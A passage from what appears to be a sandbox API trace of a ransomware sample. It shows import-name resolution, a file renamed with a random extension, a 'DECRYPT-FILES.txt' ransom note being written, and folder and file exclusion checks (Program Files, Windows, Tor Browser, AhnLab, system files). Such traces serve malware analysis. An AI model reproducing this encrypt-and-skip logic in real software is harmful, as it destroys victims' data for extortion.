lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.396] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.396] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.396] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.396] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.396] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.396] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.396] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.396] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.396] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.396] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.396] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.396] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.396] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.396] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.396] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.396] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.396] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.396] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.397] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.397] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.397] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.397] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.397] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.397] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.397] lstrlenA (lpString="DELETEATOM") returned 10 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.397] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.397] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.397] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.397] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.397] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.397] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.397] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.397] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.397] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.397] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.397] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.397] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.397] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.398] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.398] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.398] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.398] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.398] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.398] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.398] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.398] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.398] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.398] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.398] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.398] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.398] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.398] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.398] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.398] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.398] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.398] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.398] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.399] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.399] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.399] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.399] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.399] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.399] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.399] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.399] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.399] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.399] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.399] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.400] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.400] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail") returned 94 [0080.400] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.aE7cI9T") returned 102 [0080.400] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.aE7cI9T" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.ae7ci9t"), dwFlags=0x0) returned 1 [0080.400] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.401] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.401] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.401] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3bb9ed75, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 0 [0080.401] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0080.401] CloseHandle (hObject=0x450) returned 1 [0080.401] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0080.401] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0080.401] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0080.401] lstrcatW (in: lpString1="Start Menu", lpString2="\\" | out: lpString1="Start Menu\\") returned="Start Menu\\" [0080.401] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Start Menu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Program Files") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch=":\\Windows") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Games\\") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\All Users") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="AhnLab") returned 0x0 [0080.402] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.402] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 75 [0080.402] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.402] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\jkbimi8.tmp") returned 87 [0080.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0080.403] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 75 [0080.403] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.403] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\DECRYPT-FILES.txt") returned 93 [0080.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0080.403] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0080.404] CloseHandle (hObject=0x454) returned 1 [0080.405] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 75 [0080.405] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0080.405] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0080.405] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.405] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.405] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.405] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.405] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1f3920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.405] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.405] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0080.405] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0080.405] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0080.405] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0080.405] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0080.405] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1f3920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac1f3920, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac1f3920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.405] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.405] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.405] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.405] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.405] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.405] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.405] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.405] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.405] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.405] lstrcmpiW 